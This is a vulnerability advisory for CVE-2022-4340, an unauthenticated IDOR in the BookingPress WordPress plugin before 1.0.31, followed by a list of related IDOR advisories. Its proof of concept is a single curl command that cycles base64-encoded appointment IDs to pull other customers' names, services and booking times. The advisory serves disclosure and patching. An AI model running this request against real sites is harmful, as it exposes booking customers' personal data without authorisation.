BookingPress < 1.0.31 – Unauthenticated IDOR in appointment_id | CVE 2022-4340 | Plugin Vulnerabilities

Description

The plugin suffers from an Insecure Direct Object Reference (IDOR) vulnerability in it's thank you page, allowing any visitor to display information about any booking, including full name, date, time and service booked, by manipulating the appointment_id query parameter.

Proof of Concept

curl -s "http://host/thank-you/?appointment_id=$(echo 2 | base64 )" | grep  "(service|datetime|customer)" 

changing the number reveals the customer name tied to this appointment if there is no result then this appointment is not reversed yet.

Affects Plugins

bookingpress-appointment-booking

Fixed in 1.0.31

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Hussien Misbah

Submitter

Hussien Misbah

Submitter website

https://hussienmisbah.github.io/

Verified

Yes

WPVDB ID

8a7bd9f6-2789-474b-a237-01c643fdfba7

Timeline

Publicly Published

2022-12-07 (about 1 years ago)

Added

2022-12-07 (about 1 years ago)

Last Updated

2022-12-07 (about 1 years ago)

Other

Published

Title

Published

2021-05-16

Title

Listeo < 1.6.11 - Multiple Authenticated IDOR Vulnerabilities

Published

2024-04-04

Title

Watu Quiz < 3.4.1.1 - Sensitive Information Disclosure

Published

2020-10-15

Title

Realia <= 1.4 - Unauthenticated IDOR leading to Arbitrary Post Deletion

Published

2024-04-24

Title

SP Project & Document Manager <= 4.71 - Data Update via IDOR

Published

2022-12-13

Title

WPQA < 5.9.3 - Missing validation lead to functionality abuse